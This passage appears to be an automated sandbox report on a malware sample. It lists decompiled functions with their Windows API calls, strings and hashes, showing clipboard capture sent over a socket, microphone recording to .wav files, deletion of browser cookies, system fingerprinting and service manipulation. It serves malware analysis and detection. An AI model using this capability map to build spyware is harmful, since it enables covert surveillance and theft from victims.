                        • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                        • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                        • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                        Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32 ref: 00414F41
                        • EmptyClipboard.USER32 ref: 00414F4F
                        • CloseClipboard.USER32 ref: 00414F55
                        • OpenClipboard.USER32 ref: 00414F5C
                        • GetClipboardData.USER32(0000000D), ref: 00414F6C
                        • GlobalLock.KERNEL32(00000000), ref: 00414F75
                        • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                        • CloseClipboard.USER32 ref: 00414F84
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                        • String ID:
                        • API String ID: 2172192267-0
                        • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                        • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                        • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                        • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                        Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                        • __fassign.LIBCMT ref: 00447814
                        • __fassign.LIBCMT ref: 0044782F
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                        • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                        • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID:
                        • API String ID: 1324828854-0
                        • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                        • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                        • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                        • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                        Function 00453DF4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID: $-E$$-E
                        • API String ID: 269201875-3140958853
                        • Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                        • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                        • Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                        • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                        Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • _strftime.LIBCMT ref: 00401D30
                          • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                        • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                        • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                        • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                        • String ID: %Y-%m-%d %H.%M$.wav
                        • API String ID: 3809562944-3597965672
                        • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                        • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                        • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                        • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                        Function 0040AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                          • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                          • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                        • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                        • API String ID: 1133728706-4073444585
                        • Opcode ID: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                        • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                        • Opcode Fuzzy Hash: 2710e71acfe910868fa7bd05cf86435756edf937fb7501142c457778cac90120
                        • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                        Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                        • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                        • Opcode Fuzzy Hash: a9bccf30988101774ee440fa5cc9a08b358316fbf5677ac8bfda6d7ead677197
                        • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                        Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                        • _free.LIBCMT ref: 0044E128
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 0044E133
                        • _free.LIBCMT ref: 0044E13E
                        • _free.LIBCMT ref: 0044E192
                        • _free.LIBCMT ref: 0044E19D
                        • _free.LIBCMT ref: 0044E1A8
                        • _free.LIBCMT ref: 0044E1B3
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                        • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                        • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                        • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                        Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                          • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                          • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                          • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                        • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue
                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        • API String ID: 1866151309-2070987746
                        • Opcode ID: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                        • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                        • Opcode Fuzzy Hash: 905e145e97e877e89bffcd847be86f3e5d4b8ef02cc69856730a9e086f165d02
                        • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                        Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                        • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                        • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                        • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                        • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                        Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                        • GetLastError.KERNEL32 ref: 0040AA28
                        Strings
                        • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                        • UserProfile, xrefs: 0040A9EE
                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                        • [Chrome Cookies not found], xrefs: 0040AA42
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        • API String ID: 2018770650-304995407
                        • Opcode ID: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                        • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                        • Opcode Fuzzy Hash: b4927beb3b7d8682d6e8687247d88e98b96e581d4f5d1102126ce03b4be6211c
                        • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                        Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                        Download Yara Rule
                        APIs
                        • __allrem.LIBCMT ref: 00438A09
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                        • __allrem.LIBCMT ref: 00438A3C
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                        • __allrem.LIBCMT ref: 00438A71
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1992179935-0
                        • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                        • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                        • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                        • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                        Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __cftoe
                        • String ID:
                        • API String ID: 4189289331-0
                        • Opcode ID: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                        • Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
                        • Opcode Fuzzy Hash: 0fae115f831cac106012114eb4540e124d695819a26846d31b7a5b9ad28ad3e8
                        • Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C
                        Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16_free
                        • String ID: a/p$am/pm
                        • API String ID: 2936374016-3206640213
                        • Opcode ID: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                        • Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
                        • Opcode Fuzzy Hash: 5bf20948ecfdcfc47f5d03c18463ec118060d09d36ce90c1cff5387842e26ce9
                        • Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59
                        Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                        • int.LIBCPMT ref: 0040F8D7
                          • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                          • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                        • std::_Facet_Register.LIBCPMT ref: 0040F917
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                        • __Init_thread_footer.LIBCMT ref: 0040F97F
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                        • String ID:
                        • API String ID: 3815856325-0
                        • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                        • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                        • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                        • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                        Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                        • String ID:
                        • API String ID: 493672254-0
                        • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                        • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                        • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                        • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                        Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                        • _free.LIBCMT ref: 0044575C
                        • _free.LIBCMT ref: 00445784
                        • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                        • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                        • _abort.LIBCMT ref: 004457A3
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                        • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                        • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                        • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                        Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                        • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                        • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                        • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                        Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                        • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                        • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                        • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                        Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                        • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                        • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                        • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                        Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                        • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                        • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSizeSleep
                        • String ID: h G
                        • API String ID: 1958988193-3300504347
                        • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                        • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                        • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                        • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                        Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegisterClassExA.USER32(00000030), ref: 0041B310
                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                        • GetLastError.KERNEL32 ref: 0041B335
                        Strings
                        Memory Dump Source
